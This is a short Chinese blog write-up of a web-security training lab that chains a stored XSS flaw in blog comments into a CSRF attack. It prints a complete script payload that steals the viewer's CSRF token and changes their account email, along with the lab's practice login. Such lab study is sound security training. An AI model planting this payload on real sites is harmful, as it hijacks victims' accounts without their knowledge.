Lab: Exploiting XSS to perform CSRF:利用XSS執行CSRF
阿新 • • 發佈:2021-08-25
靶場內容
本實驗包含部落格評論功能中的儲存型 XSS漏洞。為解決實驗室問題,利用該漏洞進行CSRF攻擊,更改檢視博文評論的人的郵箱。
您可以使用以下憑據登入自己的帳戶: wiener:peter
漏洞解析
- 這個漏洞告訴我們,可以利用CSRF令牌執行XSS漏洞
- 所以我們要做的就是提取CSRF令牌:
- 使用如下指令碼:
<script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/my-account',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf='+token+'&[email protected]') }; </script>
- 這個指令碼可以直接將任何執行者的指令碼獲取
- 放在評論區裡面執行XSS漏洞
本文來自部落格園,作者:{Zeker62},轉載請註明原文連結:https://www.cnblogs.com/Zeker62/p/15183432.html